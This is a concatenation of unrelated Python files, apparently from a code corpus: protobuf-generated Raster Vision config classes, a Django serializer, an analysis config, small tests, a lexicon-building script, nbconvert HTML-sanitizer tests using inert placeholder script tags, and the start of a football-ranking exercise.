\x01(\x02:\x04\x30.25\x12(\n\x1dnegative_survival_probability\x18\x04 \x01(\x02:\x01\x31\x12\x1d\n\x0f\x63hips_per_scene\x18\x05 \x01(\x05:\x04\x31\x30\x30\x30\x12$\n\x16target_count_threshold\x18\x06 \x01(\x05:\x04\x32\x30\x34\x38\x12\x0e\n\x06stride\x18\x07 \x01(\x05\x42\r\n\x0b\x63onfig_type')
,
dependencies=[rastervision_dot_protos_dot_class__item__pb2.DESCRIPTOR,google_dot_protobuf_dot_struct__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_TASKCONFIG_OBJECTDETECTIONCONFIG_CHIPOPTIONS = _descriptor.Descriptor(
name='ChipOptions',
full_name='rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='neg_ratio', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions.neg_ratio', index=0,
number=1, type=2, cpp_type=6, label=2,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ioa_thresh', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions.ioa_thresh', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.8),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='window_method', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions.window_method', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=True, default_value=_b("chip").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='label_buffer', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions.label_buffer', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=814,
serialized_end=925,
)
_TASKCONFIG_OBJECTDETECTIONCONFIG_PREDICTOPTIONS = _descriptor.Descriptor(
name='PredictOptions',
full_name='rv.protos.TaskConfig.ObjectDetectionConfig.PredictOptions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='merge_thresh', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.PredictOptions.merge_thresh', index=0,
number=2, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='score_thresh', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.PredictOptions.score_thresh', index=1,
number=3, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.5),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=927,
serialized_end=997,
)
_TASKCONFIG_OBJECTDETECTIONCONFIG = _descriptor.Descriptor(
name='ObjectDetectionConfig',
full_name='rv.protos.TaskConfig.ObjectDetectionConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='class_items', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.class_items', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chip_size', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.chip_size', index=1,
number=2, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chip_options', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.chip_options', index=2,
number=3, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='predict_options', full_name='rv.protos.TaskConfig.ObjectDetectionConfig.predict_options', index=3,
number=4, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TASKCONFIG_OBJECTDETECTIONCONFIG_CHIPOPTIONS, _TASKCONFIG_OBJECTDETECTIONCONFIG_PREDICTOPTIONS, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=563,
serialized_end=997,
)
_TASKCONFIG_CHIPCLASSIFICATIONCONFIG = _descriptor.Descriptor(
name='ChipClassificationConfig',
full_name='rv.protos.TaskConfig.ChipClassificationConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='class_items', full_name='rv.protos.TaskConfig.ChipClassificationConfig.class_items', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chip_size', full_name='rv.protos.TaskConfig.ChipClassificationConfig.chip_size', index=1,
number=2, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=999,
serialized_end=1087,
)
_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG_CHIPOPTIONS = _descriptor.Descriptor(
name='ChipOptions',
full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='window_method', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.window_method', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=True, default_value=_b("random_sample").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='target_classes', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.target_classes', index=1,
number=2, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='debug_chip_probability', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.debug_chip_probability', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.25),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='negative_survival_probability', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.negative_survival_probability', index=3,
number=4, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chips_per_scene', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.chips_per_scene', index=4,
number=5, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=1000,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='target_count_threshold', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.target_count_threshold', index=5,
number=6, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=2048,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='stride', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions.stride', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1297,
serialized_end=1537,
)
_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG = _descriptor.Descriptor(
name='SemanticSegmentationConfig',
full_name='rv.protos.TaskConfig.SemanticSegmentationConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='class_items', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.class_items', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chip_size', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.chip_size', index=1,
number=2, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chip_options', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.chip_options', index=2,
number=3, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='predict_chip_size', full_name='rv.protos.TaskConfig.SemanticSegmentationConfig.predict_chip_size', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG_CHIPOPTIONS, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1090,
serialized_end=1537,
)
_TASKCONFIG = _descriptor.Descriptor(
name='TaskConfig',
full_name='rv.protos.TaskConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='task_type', full_name='rv.protos.TaskConfig.task_type', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='predict_batch_size', full_name='rv.protos.TaskConfig.predict_batch_size', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=10,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='predict_package_uri', full_name='rv.protos.TaskConfig.predict_package_uri', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='debug', full_name='rv.protos.TaskConfig.debug', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=True,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='predict_debug_uri', full_name='rv.protos.TaskConfig.predict_debug_uri', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='object_detection_config', full_name='rv.protos.TaskConfig.object_detection_config', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='chip_classification_config', full_name='rv.protos.TaskConfig.chip_classification_config', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='semantic_segmentation_config', full_name='rv.protos.TaskConfig.semantic_segmentation_config', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='custom_config', full_name='rv.protos.TaskConfig.custom_config', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TASKCONFIG_OBJECTDETECTIONCONFIG, _TASKCONFIG_CHIPCLASSIFICATIONCONFIG, _TASKCONFIG_SEMANTICSEGMENTATIONCONFIG, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='config_type', full_name='rv.protos.TaskConfig.config_type',
index=0, containing_type=None, fields=[]),
],
serialized_start=114,
serialized_end=1552,
)
_TASKCONFIG_OBJECTDETECTIONCONFIG_CHIPOPTIONS.containing_type = _TASKCONFIG_OBJECTDETECTIONCONFIG
_TASKCONFIG_OBJECTDETECTIONCONFIG_PREDICTOPTIONS.containing_type = _TASKCONFIG_OBJECTDETECTIONCONFIG
_TASKCONFIG_OBJECTDETECTIONCONFIG.fields_by_name['class_items'].message_type = rastervision_dot_protos_dot_class__item__pb2._CLASSITEM
_TASKCONFIG_OBJECTDETECTIONCONFIG.fields_by_name['chip_options'].message_type = _TASKCONFIG_OBJECTDETECTIONCONFIG_CHIPOPTIONS
_TASKCONFIG_OBJECTDETECTIONCONFIG.fields_by_name['predict_options'].message_type = _TASKCONFIG_OBJECTDETECTIONCONFIG_PREDICTOPTIONS
_TASKCONFIG_OBJECTDETECTIONCONFIG.containing_type = _TASKCONFIG
_TASKCONFIG_CHIPCLASSIFICATIONCONFIG.fields_by_name['class_items'].message_type = rastervision_dot_protos_dot_class__item__pb2._CLASSITEM
_TASKCONFIG_CHIPCLASSIFICATIONCONFIG.containing_type = _TASKCONFIG
_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG_CHIPOPTIONS.containing_type = _TASKCONFIG_SEMANTICSEGMENTATIONCONFIG
_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG.fields_by_name['class_items'].message_type = rastervision_dot_protos_dot_class__item__pb2._CLASSITEM
_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG.fields_by_name['chip_options'].message_type = _TASKCONFIG_SEMANTICSEGMENTATIONCONFIG_CHIPOPTIONS
_TASKCONFIG_SEMANTICSEGMENTATIONCONFIG.containing_type = _TASKCONFIG
_TASKCONFIG.fields_by_name['object_detection_config'].message_type = _TASKCONFIG_OBJECTDETECTIONCONFIG
_TASKCONFIG.fields_by_name['chip_classification_config'].message_type = _TASKCONFIG_CHIPCLASSIFICATIONCONFIG
_TASKCONFIG.fields_by_name['semantic_segmentation_config'].message_type = _TASKCONFIG_SEMANTICSEGMENTATIONCONFIG
_TASKCONFIG.fields_by_name['custom_config'].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_TASKCONFIG.oneofs_by_name['config_type'].fields.append(
_TASKCONFIG.fields_by_name['object_detection_config'])
_TASKCONFIG.fields_by_name['object_detection_config'].containing_oneof = _TASKCONFIG.oneofs_by_name['config_type']
_TASKCONFIG.oneofs_by_name['config_type'].fields.append(
_TASKCONFIG.fields_by_name['chip_classification_config'])
_TASKCONFIG.fields_by_name['chip_classification_config'].containing_oneof = _TASKCONFIG.oneofs_by_name['config_type']
_TASKCONFIG.oneofs_by_name['config_type'].fields.append(
_TASKCONFIG.fields_by_name['semantic_segmentation_config'])
_TASKCONFIG.fields_by_name['semantic_segmentation_config'].containing_oneof = _TASKCONFIG.oneofs_by_name['config_type']
_TASKCONFIG.oneofs_by_name['config_type'].fields.append(
_TASKCONFIG.fields_by_name['custom_config'])
_TASKCONFIG.fields_by_name['custom_config'].containing_oneof = _TASKCONFIG.oneofs_by_name['config_type']
DESCRIPTOR.message_types_by_name['TaskConfig'] = _TASKCONFIG
TaskConfig = _reflection.GeneratedProtocolMessageType('TaskConfig', (_message.Message,), dict(
ObjectDetectionConfig = _reflection.GeneratedProtocolMessageType('ObjectDetectionConfig', (_message.Message,), dict(
ChipOptions = _reflection.GeneratedProtocolMessageType('ChipOptions', (_message.Message,), dict(
DESCRIPTOR = _TASKCONFIG_OBJECTDETECTIONCONFIG_CHIPOPTIONS,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig.ObjectDetectionConfig.ChipOptions)
))
,
PredictOptions = _reflection.GeneratedProtocolMessageType('PredictOptions', (_message.Message,), dict(
DESCRIPTOR = _TASKCONFIG_OBJECTDETECTIONCONFIG_PREDICTOPTIONS,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig.ObjectDetectionConfig.PredictOptions)
))
,
DESCRIPTOR = _TASKCONFIG_OBJECTDETECTIONCONFIG,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig.ObjectDetectionConfig)
))
,
ChipClassificationConfig = _reflection.GeneratedProtocolMessageType('ChipClassificationConfig', (_message.Message,), dict(
DESCRIPTOR = _TASKCONFIG_CHIPCLASSIFICATIONCONFIG,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig.ChipClassificationConfig)
))
,
SemanticSegmentationConfig = _reflection.GeneratedProtocolMessageType('SemanticSegmentationConfig', (_message.Message,), dict(
ChipOptions = _reflection.GeneratedProtocolMessageType('ChipOptions', (_message.Message,), dict(
DESCRIPTOR = _TASKCONFIG_SEMANTICSEGMENTATIONCONFIG_CHIPOPTIONS,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig.SemanticSegmentationConfig.ChipOptions)
))
,
DESCRIPTOR = _TASKCONFIG_SEMANTICSEGMENTATIONCONFIG,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig.SemanticSegmentationConfig)
))
,
DESCRIPTOR = _TASKCONFIG,
__module__ = 'rastervision.protos.task_pb2'
# @@protoc_insertion_point(class_scope:rv.protos.TaskConfig)
))
_sym_db.RegisterMessage(TaskConfig)
_sym_db.RegisterMessage(TaskConfig.ObjectDetectionConfig)
_sym_db.RegisterMessage(TaskConfig.ObjectDetectionConfig.ChipOptions)
_sym_db.RegisterMessage(TaskConfig.ObjectDetectionConfig.PredictOptions)
_sym_db.RegisterMessage(TaskConfig.ChipClassificationConfig)
_sym_db.RegisterMessage(TaskConfig.SemanticSegmentationConfig)
_sym_db.RegisterMessage(TaskConfig.SemanticSegmentationConfig.ChipOptions)
# @@protoc_insertion_point(module_scope)
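# --- Illustrative use of the generated classes above (an addition, not part of
# the generated module; it would live in a separate script). The import path
# follows the __module__ strings in this file, the field values are made up,
# and ClassItem is skipped because class_item.proto is not shown here.
from rastervision.protos import task_pb2

cfg = task_pb2.TaskConfig()
cfg.task_type = 'object_detection'        # required string field
od = cfg.object_detection_config          # touching it selects the 'config_type' oneof
od.chip_size = 300                        # required int32
od.chip_options.neg_ratio = 1.0           # required float; ioa_thresh/window_method keep their defaults
od.predict_options.merge_thresh = 0.5
od.predict_options.score_thresh = 0.5

print(cfg.WhichOneof('config_type'))      # -> 'object_detection_config'
data = cfg.SerializeToString()            # proto2 wire format
roundtrip = task_pb2.TaskConfig.FromString(data)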
| python |
from rest_framework.serializers import ModelSerializer
from .models import UploadedFile
class UploadedFileSerializer(ModelSerializer):
class Meta:
model = UploadedFile
fields = ("id" , "user_id" , "file" , "size" , "type" )
def __init__(self, *args, **kwargs):
super(UploadedFileSerializer, self).__init__(*args, **kwargs)
self.fields['size'].required = False
self.fields['type'].required = False
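# --- Hedged usage sketch (an addition, not part of the original file).
# UploadedFile's concrete field types are not shown above, so the payload is
# purely illustrative; the point is only that 'size' and 'type' may be omitted.
serializer = UploadedFileSerializer(data={"user_id": 1, "file": "uploads/a.txt"})
serializer.is_valid()        # omitting 'size' and 'type' does not by itself fail validation
print(serializer.errors)     # any remaining errors come from the other fields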
| python |
# Data sources
tissues = {
'TCGA': ['All'],
'GDSC': ['All']
}
projects = {
'TCGA':[None],
'GDSC': None
}
data_sources = ['GDSC', 'TCGA']
data_types = ['rnaseq']
genes_filtering = 'mini'
source = 'GDSC'
target = 'TCGA'
# TRANSACT analysis
kernel_surname = 'rbf_gamma_0_0005'
kernel_name = 'rbf'
kernel_param = {
'gamma': 0.0005
}
number_pc = {
'source': 70,
'target': 150
}
n_pv = 30
n_interpolation = 100
n_jobs = 20
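# --- Generic sketch (an addition, not the TRANSACT pipeline itself): shows how
# the kernel settings above map onto scikit-learn's KernelPCA. X_source and
# X_target are random placeholders for the GDSC / TCGA rnaseq matrices; n_pv
# and n_interpolation are TRANSACT-specific and unused here.
import numpy as np
from sklearn.decomposition import KernelPCA

X_source = np.random.rand(200, 1000)
X_target = np.random.rand(150, 1000)

source_pca = KernelPCA(n_components=number_pc['source'], kernel=kernel_name,
                       n_jobs=n_jobs, **kernel_param)
target_pca = KernelPCA(n_components=number_pc['target'], kernel=kernel_name,
                       n_jobs=n_jobs, **kernel_param)

source_components = source_pca.fit_transform(X_source)
target_components = target_pca.fit_transform(X_target)
| python |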
import unittest
from mocks import MockUser
class TestUser(unittest.TestCase):
def testEmailNickname(self):
user = MockUser(email="[email protected]")
self.assertEquals(str(user), "foo")
def testNicknameOverride(self):
user = MockUser(email="[email protected]", nickname="bar")
self.assertEquals(str(user), "bar")
if __name__ == "__main__":
unittest.main()
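# --- Hypothetical sketch (an addition, not part of the original file): the
# 'mocks' module is not shown here, but a minimal MockUser satisfying the two
# tests above could look like this.
class MockUser:
    def __init__(self, email, nickname=None):
        self.email = email
        self.nickname = nickname

    def __str__(self):
        # Fall back to the part of the email address before the '@'
        return self.nickname or self.email.split("@")[0]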
| python |
#!/usr/bin/env python3
import sys
def main(phone_map, abbreviations):
phone_map = {v[0]: v[1].strip()
for v in (l.split(None, 1)
for l in open(phone_map, encoding='utf-8'))}
abbr_map = {v[0]: v[1].strip().split(',')
for v in (l.split(None, 1)
for l in open(abbreviations, encoding='utf-8') if len(l.strip()) > 0)} if abbreviations is not None else {}
o = sys.stdout.buffer
o.write(b"__(1.0) __\n")
o.write(b"_(1.0) _\n")
o.write(b"<s>(1.0)\n")
o.write(b"</s>(1.0)\n")
for word in sys.stdin.readlines():
word = word.strip()
transcriptions = []
basic = [phone_map[c] for c in word if c in phone_map]
if len(basic) > 0:
transcriptions.append(basic)
if word in abbr_map:
for abbr in abbr_map[word]:
transcriptions.append([phone_map[c] for c in abbr if c in phone_map])
transcriptions = set("".join(t) for t in transcriptions)
for trans in transcriptions:
o.write("{}({:.1f}) ".format(word, 1/len(transcriptions)).encode("utf-8"))
rtrans = "_"+trans+"_"
for i in range(1, len(trans)+1):
if rtrans[i].startswith("_"):
o.write("{} ".format(rtrans[i]).encode("iso-8859-15"))
else:
o.write("{}-{}+{} ".format(rtrans[i-1],rtrans[i],rtrans[i+1]).encode("iso-8859-15"))
o.write(b"\n")
if __name__ == "__main__":
main(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else None)
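# --- Stand-alone illustration (an addition, not part of the original script) of
# the triphone expansion performed above, assuming every character maps to a
# single-character phone, as the main loop requires. The word and map are made up.
demo_phone_map = {'k': 'k', 'a': 'a', 's': 's'}
demo_word = 'kas'
demo_trans = ''.join(demo_phone_map[c] for c in demo_word)      # 'kas'
demo_rtrans = '_' + demo_trans + '_'
demo_parts = []
for i in range(1, len(demo_trans) + 1):
    if demo_rtrans[i].startswith('_'):
        demo_parts.append(demo_rtrans[i])
    else:
        demo_parts.append('{}-{}+{}'.format(demo_rtrans[i - 1], demo_rtrans[i], demo_rtrans[i + 1]))
print('{}(1.0) {}'.format(demo_word, ' '.join(demo_parts)))      # kas(1.0) _-k+a k-a+s a-s+_
# Typical invocation (file names hypothetical):
#   ./lexicon.py phone_map.txt abbreviations.txt < words.txt > lexicon.dict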
| python |
"""Tests for the HTMLSanitize preprocessor"""
from .base import PreprocessorTestsBase
from ..sanitize import SanitizeHTML
from nbformat import v4 as nbformat
class TestSanitizer(PreprocessorTestsBase):
"""Contains test functions for sanitize.py"""
maxDiff = None
def build_preprocessor(self):
"""Make an instance of a preprocessor"""
preprocessor = SanitizeHTML()
preprocessor.enabled = True
return preprocessor
def preprocess_source(self, cell_type, source, preprocessor):
nb = self.build_notebook()
res = self.build_resources()
nb.cells[0].cell_type = cell_type
nb.cells[0].source = source
nb, res = preprocessor(nb, res)
return nb.cells[0].source
def test_constructor(self):
"""Can a SanitizeHTML be constructed?"""
self.build_preprocessor()
def test_svg_handling(self):
"""
Test to make sure that svgs are handled 'properly'
We only allow <img> tags (via markdown syntax) and not all the other ways
to embed svg: <object>, <embed>, <iframe> nor inline <svg>
"""
preprocessor = self.build_preprocessor()
preprocessor.strip = True
self.assertEqual(
self.preprocess_source(
'markdown',
"""

<object data="something.svg" type="image/svg+xml"></object>
<embed data="something.svg" type="image/svg+xml" />
<iframe src="http://example.com/something.svg"></iframe>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 68 65">
<path fill="#1A374D" d="M42 27v-20c0-3.7-3.3-7-7-7s-7 3.3-7 7v21l12 15-7 15.7c14.5 13.9 35 2.8 35-13.7 0-13.3-13.4-21.8-26-18zm6 25c-3.9 0-7-3.1-7-7s3.1-7 7-7 7 3.1 7 7-3.1 7-7 7z"/>
<path d="M14 27v-20c0-3.7-3.3-7-7-7s-7 3.3-7 7v41c0 8.2 9.2 17 20 17s20-9.2 20-20c0-13.3-13.4-21.8-26-18zm6 25c-3.9 0-7-3.1-7-7s3.1-7 7-7 7 3.1 7 7-3.1 7-7 7z"/>
</svg>
""",
preprocessor
).strip(),
"""

""".strip(),
)
def test_tag_whitelist_stripping(self):
"""Test tag whitelisting + stripping out offending tags"""
preprocessor = self.build_preprocessor()
preprocessor.strip = True
self.assertEqual(
self.preprocess_source(
'markdown',
'_A_ <em>few</em> <script>tags</script>',
preprocessor
),
'_A_ <em>few</em> tags'
)
def test_comment_stripping(self):
"""Test HTML comment stripping"""
preprocessor = self.build_preprocessor()
self.assertEqual(
self.preprocess_source(
'markdown',
'_A_ <em>few</em> <!-- tags -->',
preprocessor
),
'_A_ <em>few</em> '
)
preprocessor.strip_comments = False
self.assertEqual(
self.preprocess_source(
'markdown',
'_A_ <em>few</em> <!-- tags -->',
preprocessor
),
'_A_ <em>few</em> <!-- tags -->'
)
def test_attributes_whitelist(self):
"""Test style"""
preprocessor = self.build_preprocessor()
preprocessor.attributes['a'] = ['href', 'title']
self.assertEqual(
self.preprocess_source(
'markdown',
'<a href="link" rel="nofollow">Hi</a>',
preprocessor
),
'<a href="link">Hi</a>'
)
def test_style_whitelist(self):
"""Test style"""
preprocessor = self.build_preprocessor()
if '*' in preprocessor.attributes:
preprocessor.attributes['*'].append('style')
else:
preprocessor.attributes['*'] = ['style']
preprocessor.styles = [
'color',
]
self.assertEqual(
self.preprocess_source(
'markdown',
'_A_ <em style="color: blue; background-color: pink">'
'few</em> <script>tags</script>',
preprocessor
),
'_A_ <em style="color: blue;">few</em> '
'<script>tags</script>'
)
def test_tag_passthrough(self):
"""Test passing through raw output"""
preprocessor = self.build_preprocessor()
self.assertEqual(
self.preprocess_source(
'raw',
'_A_ <em>few</em> <script>tags</script>',
preprocessor
),
'_A_ <em>few</em> <script>tags</script>'
)
def test_output_sanitizing(self):
"""Test that outputs are also sanitized properly"""
preprocessor = self.build_preprocessor()
nb = self.build_notebook()
outputs = [
nbformat.new_output("display_data", data={
'text/plain': 'b',
'text/html': '<script>more evil</script>',
'text/css': '<style> * {display:none}</style>'
}),
nbformat.new_output('stream', name='stdout', text="wat"),
nbformat.new_output('stream', name='stdout', text="<script>Evil tag</script>")
]
nb.cells[0].outputs = outputs
res = self.build_resources()
nb, res = preprocessor(nb, res)
expected_output = [
{
'data': {
'text/html': '<script>more evil</script>',
'text/plain': 'b'
},
'metadata': {},
'output_type': 'display_data',
},
{
'name': 'stdout',
'output_type': 'stream',
'text': 'wat'
},
{
'name': 'stdout',
'output_type':
'stream', 'text': '<script>Evil tag</script>'
}
]
self.assertEqual(nb.cells[0].outputs, expected_output)
def test_tag_whitelist(self):
"""Test tag whitelisting"""
preprocessor = self.build_preprocessor()
self.assertEqual(
self.preprocess_source(
'markdown',
'_A_ <em>few</em> <script>tags</script>',
preprocessor
),
'_A_ <em>few</em> <script>tags</script>'
)
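# --- Hedged configuration sketch (an addition, not part of the original tests):
# outside the test-suite the preprocessor is normally attached to an exporter
# via config. The trait names mirror the ones exercised above; verify the
# dotted path against your nbconvert version.
from traitlets.config import Config
from nbconvert import HTMLExporter

c = Config()
c.HTMLExporter.preprocessors = ['nbconvert.preprocessors.SanitizeHTML']
c.SanitizeHTML.strip = True                           # drop disallowed tags entirely
c.SanitizeHTML.attributes = {'a': ['href', 'title']}  # replaces the default whitelist
exporter = HTMLExporter(config=c)
# body, resources = exporter.from_filename('notebook.ipynb')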
| python |
'''Two teams, Cormengo and Flaminthians,
take part in a football championship,
together with other teams. Each win is
worth three points and each draw one point.
The team with more points is ranked higher
in the championship. If two teams are tied
on points, the team with the better goal
difference is ranked higher. If both the
points and the goal difference are the same
for the two teams, then the two teams are
tied in the championship.
Given the numbers of wins and draws and the
